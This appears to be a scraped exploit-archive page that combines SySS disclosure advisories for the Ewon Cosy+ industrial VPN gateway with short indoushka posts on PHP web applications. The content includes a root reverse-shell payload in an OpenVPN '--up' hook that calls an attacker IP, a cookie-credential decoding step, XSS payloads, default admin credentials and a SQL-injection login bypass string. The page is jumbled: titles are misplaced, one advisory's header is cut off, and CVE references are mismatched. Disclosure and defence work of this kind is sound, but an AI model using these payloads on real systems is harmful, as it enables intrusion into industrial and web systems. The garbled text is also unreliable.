~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Authenticated attackers are able to upload a custom OpenVPN configuration.  
This configuration can contain the OpenVPN paramaters "--up" and "--down",  
which execute a specified script or executable.

Since the process itself runs with the highest privileges (root),  
this allows the device to be completely compromised.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Generate a malicious OpenVPN configuration, e.g. instructing the device  
     to create a reverse shell:

     client  
     dev tun  
     persist-tun  
     proto tcp  
     verb 5  
     mute 20  
     --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet <attacker-ip> 5000 0<$TF | sh 1>$TF"'  
     script-security 2  
         [...]

2. Start a listener on the attacker system:  
     #> nc -lvp 5000

3. Upload the OpenVPN configuration via FTP to Cosy+.

4. Set the configuration paramater "VPNCfgFile" to "/usr/<vpnfile>".

5. Command is executed by Cosy+ and a reverse shell is initiated:

     nc -lvp 5000  
     istening on 0.0.0.0 5000  
     Connection received on 192.168.10.240 56806  
     id  
     uid=0(root) gid=0(root)

Note:  
     The paramaters "--up" and "--down" need to be specified with  
     two dashes since the values "up" and "down" are blocklisted on the  
     device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer note[4], the vulnerability was fixed  
with the firmware versions 21.2s10 and 22.1s3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-03-26: Vulnerability discovered  
2024-03-27: Vulnerability reported to manufacturer  
2024-04-02: Inquiry about the status  
2024-04-05: Manufacturer acknowlegded the vulnerability and started the  
             analysis  
2024-04-10: Two more vulnerabilities reported to the manufacturer  
             (SYSS-2024-032 and SYSS-2024-033)  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-15: Manufacturer sent a technical overview of planned remediation  
             actions and details about the planned timeline  
2024-04-15: Acknowlegded the remediation actions and asked the manufacturer  
             for assigning a CVE ID  
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer  
2024-05-31: Manufacturer informed that the fix is in completion stage and  
             asked if the blog post[6] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-06-21: Inquiry about the status  
2024-06-21: Received an out-of-office auto reply  
2024-07-01: Inquiry about the status  
2024-07-04: Inquiry about the status  
2024-07-12: Inquiry about the status and letting the manufacturer know that  
             the vulnerability will be published within a talk at DEF CON[7]  
             in August  
2024-07-12: Manufacturer responded that the fix is planned by the end of  
             July; manufacturer asked again for reviewing the blog post  
             draft  
2024-07-12: Again confirmed reviewing the blog post is possible and asking  
             for the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post and confirmed that a  
             fix is provided  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-018  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-018.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33896  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33896  
[6] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay41IACgkQrgyb+PE0  
i1PIhQ//YBS1kK+SZAdwVcRCA1fPxKdfHVlHswwiQzyNWvTso35HsQm+cYOJd/zL  
gb9JJ0VqgohVezL9UVJhkbEVZbUNwAX13XpcjQimsxcVgx5jCus/4JUCH3+9vPCx  
lZyc+r5gzP7d3/a1sfGO739bkg8+itkp9jxhoZm5WOA+eg5Tz1j4tJN4uU79ikax  
5HGubG3dxWq2EQPeEa4+eyKgQCRQTZzX+fiyqfSbRMQq7v4/GbMqH3FtI1CzxoZ3  
HfsxQyPu3eUjQuykpMauwuwSgs11Yop9EBDzTuH1+OTmWUMy9exWmixcj/Sst+D9  
6rHQkY+CozFy0ml4mQtp/CpN+Jj0op+BtSw1ILwLUL3aqXa96Ud+62ht9EDBQn/9  
repfcR5hx9Lj9gfrn46ciW8S/Zy5PghYjOvxC75rsiU3ZHhp/aNF9uKgrdnbZGQe  
+CzompLF3pM8bCSwtUEauEfK+XArUg0oiN/d2Dl3LMqHJoK4Q1DkgD5v4POmtHsM  
HaSuE0i57fezwnELg5XNLKRpno57I4LEn1CWm4qebyJvAkodO32DGWAx+Qfh34tG  
R3Lj71uH1ffepHxMzPsW1WHHnOqjsXQIYw6yq6eJqHwS/ygR/OTVnGri5e4Xq/tN  
AZyo5WrR3iTmZMBhPAaDoLfclUG4IucGdJKGop9IKkeNTHXkuGk=  
=75wq  
-----END PGP SIGNATURE-----

Ewon Cosy+ Command Injection

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The credentials used for the basic authentication against the web interface of Cosy+ are stored in the cookie "credentials" after a successful login. An attacker with access to a victim's browser is able to retrieve the administrative password of Cosy+.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-017  
Product:                   Ewon Cosy+  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       Firmware Versions: < 21.2s10 and < 22.1s3  
Tested Version(s):         Firmware Version: 21.2s7  
Vulnerability Type:        Cleartext Storage of Sensitive Information in a Cookie (CWE-315)  
Risk Level:                Low  
Solution Status:           Fixed  
Manufacturer Notification: 2024-03-27  
Solution Date:             2024-07-18  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33892  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

Due to cleartext storage of the password in a cookie, an attacker with  
appropriate access is able to retrieve the plaintext administrative  
password.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The credentials used for the basic authentication against the web  
interface of Cosy+ are stored in the cookie "credentials" after a  
successful login.

An attacker with access to a victim's browser is able to retrieve the  
administrative password of Cosy+.

In addition, the cookie is not secured (no HttpOnly, Secure or  
SameSite attribute is set). Thus, the credentials could also be extracted  
in combination with cross-site scripting (XSS) vulnerabilities.

Note: During the responsible disclosure process, SySS GmbH became aware of  
CVE-2015-7928[8], which describes an issue with password autocomplete  
in Ewon devices. Since this function contains the problematic cookie,  
this CVE may already describe the insecure cookie. SySS GmbH would therefore  
like to credit the reporter of CVE-2015-7928, Karn Ganeshen.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. "credentials" cookie value: YWRtOlN1cDNyUzNjcjN0IyM=

2. Decoded credentials:  
     #> echo -n "YWRtOlN1cDNyUzNjcjN0IyM=" | base64 -d  
         adm:Sup3rS3cr3t##

Bonus: accessing the cookie from JavaScript code:  
<script>alert("Credentials can be access via JavaScript" + document.cookie)</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer note[4], the vulnerability was fixed  
with the firmware versions 21.2s10 and 22.1s3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-03-26: Vulnerability discovered  
2024-03-27: Vulnerability reported to manufacturer  
2024-04-02: Inquiry about the status  
2024-04-05: Manufacturer acknowlegded the vulnerability and started the  
             analysis  
2024-04-10: Two more vulnerabilities reported to the manufacturer  
             (SYSS-2024-032 and SYSS-2024-033)  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-15: Manufacturer sent a technical overview of planned remediation  
             actions and details about the planned timeline  
2024-04-15: Acknowlegded the remediation actions and asked the manufacturer  
             to assign a CVE ID  
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer  
2024-05-31: Manufacturer informed that the fix is in completion stage and  
             asked if the blog post[6] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-06-21: Inquiry about the status  
2024-06-21: Received an out-of-office auto reply  
2024-07-01: Inquiry about the status  
2024-07-04: Inquiry about the status  
2024-07-12: Inquiry about the status and letting the manufacturer know that  
             the vulnerability will be published within a talk at DEF CON[7]  
             in August  
2024-07-12: Manufacturer responded that the fix is planned by the end of  
             July; manufacturer asked again for reviewing the blog post  
             draft  
2024-07-12: Again confirmed reviewing the blog post is possible and asking  
             for the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post and confirmed that a  
             fix is provided  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-017  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-017.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33892  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33892  
[6] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521  
[8] CVE-2015-7928  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7928

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4zQACgkQrgyb+PE0  
i1Oq5hAApN8Ekc20CgEg5KyIFK18sKBPzSA/SeZcSdUOkv8N05riytWxbVFuLBpS  
LhHH9spxUjn6Sr36JDp5dISCj9rtajrNE/adIiNC9LUhBRIr2h1ogFfh5zKK8N9D  
m4CXknQ3b2QQctkuhywyKSKjvNnvxj+k6nDIFlTzXdl3e9cEpisaAFr8zt9/jb7d  
ZBt8HHrEvJRCa5eBK40r0t42xFiWILh98enmLVCM2VOUnaAxz6JXLTunRSXqC6WH  
SzEOR/G32z+NxNCphPuswlIqfnhoaOFQ7oP2miuGglDdm5yWQX6E+xtp5HUelmkS  
DyZ6nUPOmr67lOgOUIhtIQp4zRYNiQAvDv70x9k/RCv+VDG4B5qEffFIbq6JgSCW  
Q+5iQXfDEJwuj0ePIe/wO+svn7C7LOSfvRfjw39GF0gTeKhPi8cNj5S+Jpl3M6pP  
XWEHcHzhVze9t5CLFgkh4GtmqH4OvWvFxn8d3x5h21eljloobUNZXAWlUYJdb6Ae  
gNhWD3IKQJyPo/4cyDC5iZS6QtivjyiQUb6aU6vqKWcR7tlnr7jferG00Q3Sz8R2  
ddC8Vw78j2GvzyCibNhSoKGfjQAOhYgfsH8ktRDQ/zDYguT4cHA++V16MbfXwIv0  
y3mQqModAAlpqYGVf4783H24kuyP19KewZuj5dSsMTyShIcTkCU=  
=LXSO  
-----END PGP SIGNATURE-----

Ewon Cosy+ Password Disclosure

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. If login against the FTP service of the Cosy+ fails, the submitted username is saved in a log. This log is included in the Cosy+ web interface without neutralizing the content. As a result, an unauthenticated attacker is able to inject HTML/JavaScript code via the username of an FTP login attempt.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-016  
Product:                   Ewon Cosy+  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       Firmware Versions: < 21.2s10 and < 22.1s3  
Tested Version(s):         Firmware Version: 21.2s7  
Vulnerability Type:        Improper Neutralization of Input During Web Page Generation (CWE-79)  
Risk Level:                Medium  
Solution Status:           Fixed  
Manufacturer Notification: 2024-03-27  
Solution Date:             2024-07-18  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33893  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

Due to improper neutralization of input, an unauthenticated attacker  
is able to inject HTML and JavaScript code into the administrative  
web interface of the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

If login against the FTP service of the Cosy+ fails, the submitted  
username is saved in a log.  
This log is included in the Cosy+ web interface without neutralizing  
the content.  
As a result, an unauthenticated attacker is able to inject  
HTML/JavaScript code via the username of an FTP login attempt.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Login attempt against Cosy+ FTP service:  
     #> ftp "<script src=//x>"@192.168.10.33

2. JavaScript is included when visiting the event logs on Cosy+ web  
     interface (http://192.168.10.33/index.shtm#EVLogsTbl):

     <div class="x-grid-cell-inner " style="text-align:left;">  
         eftp-Close FTP session (User: <script src="//x">  
     </div">

Note:  
     The FTP username is limited to 16 characters and therefore the  
     payload length is limited too.  
     However, exploitation is still possible, e.g. by controlling  
     DNS responses or using short URLs, e.g. an emoji domain.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer note[4], the vulnerability was fixed  
with the firmware versions 21.2s10 and 22.1s3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-03-26: Vulnerability discovered  
2024-03-27: Vulnerability reported to manufacturer  
2024-04-02: Inquiry about the status  
2024-04-05: Manufacturer acknowlegded the vulnerability and started the  
             analysis  
2024-04-10: Two more vulnerabilities reported to the manufacturer  
             (SYSS-2024-032 and SYSS-2024-033)  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-15: Manufacturer sent a technical overview of planned remediation  
             actions and details about the planned timeline  
2024-04-15: Acknowlegded the remediation actions and asked the manufacturer  
             to assign a CVE ID  
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer  
2024-05-31: Manufacturer informed that the fix is in completion stage and  
             asked if the blog post[6] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-06-21: Inquiry about the status  
2024-06-21: Received an out-of-office auto reply  
2024-07-01: Inquiry about the status  
2024-07-04: Inquiry about the status  
2024-07-12: Inquiry about the status and letting the manufacturer know that  
             the vulnerability will be published within a talk at DEF CON[7]  
             in August  
2024-07-12: Manufacturer responded that the fix is planned by the end of  
             July; manufacturer asked again for reviewing the blog post  
             draft  
2024-07-12: Again confirmed reviewing the blog post is possible and asking  
             for the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post and confirmed that a  
             fix is provided  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-016  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-016.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33893  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33893  
[6] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4vsACgkQrgyb+PE0  
i1M+GA//R3tvHZW7B21Kf+8aZcVONuL56yzPOyqEdISB0joFi9yvzGkqCJPYws5t  
vFojVlZT38COf64ZC2siFQCJrtOzMa+zWT3kpSeBFsNQ60Sx79UaCdQVa6GjpZm/  
8qSNWtCpOMGmj95FwYaHuZbKxiSifyIjsVteADqiaysWVx7kXapktPSD2KiOBJSp  
Ycg81WfRS10ELiUWoLZ5GTXhzQKzH0Tsh6h1qNHWy5GkHLwIQKkzicQ5wR1ZRzK4  
o6k8cJySgAqgJ3gmGU9iUUElppPXj7EFOK7m8q0ny5gQpQfz3dMPxJz5eK8zBazd  
1c9OjgdZNcgzschhKsl/JX+3YVGQzmNo5rSOIbJS4+7Oe0UcTaggzbgj80GGOakT  
vLC9GqmgYUsv+yr2Dp10pUg/plySeScDhYlkZ+VN9GDcEVodiKzM6wukj1eDEw0+  
6CzHKnGvKOa322AVnKF+xdB/c+sDCEaD73S47gt8CfG57J7bcpth3Gf9RkLtLFXC  
U3yiT7FmY/KH7WZvmnyhsk/Go66aGRy0d1hQl/tzdnBVdDn1IZToymnC/YVDxqxc  
Q9GsDhkpDOyozgrhUdef64RY5ZOzXcpNJvCM1RxjP65ZMxiPpZ0z/3IuGJ+DUWkM  
f8Sm21hfsgkq8UmnLtSnDCUyPTxJISTK9lwleYkqodqJrXUlUD0=  
=HV5Q  
-----END PGP SIGNATURE-----

Ewon Cosy+ Improper Neutralization / Cross Site Scripting

Lawyer CMS version 1.6 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Lawyer CMS 1.6 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/lawyer/                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/lawyer//adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Lawyer CMS 1.6 Insecure Settings

Karya Online Shopping Portal version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Karya Online Shopping Portal 2.0 auth by pass Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.shahsanjiv.com.np/                                                                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/shopping/ADMIN/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Karya Online Shopping Portal 2.0 SQL Injection

JobSeeker CMS version 1.5 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : JobSeeker CMS 1.5 Insecure Settings Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/jobseeker/                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/jobseeker/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

JobSeeker CMS 1.5 Insecure Settings

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

**Jobs Finder System 1.0 SQL Injection**

Posted Aug 19, 2024

Authored by indoushka

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 0e14944aabacd3bde55dc9ca768a85b25224b5d197aed3ef9cecb63e14d97575

Download | Favorite | View

**Jobs Finder System 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : jobs Finder System v1.0 SQL injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /jobs.php?id=3 <=== inject here[+] http://127.0.0.1/jobportal-master/jobs.php?id=3 [+]  Login : http://127.0.0.1/jobportal-master/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Tag

#windows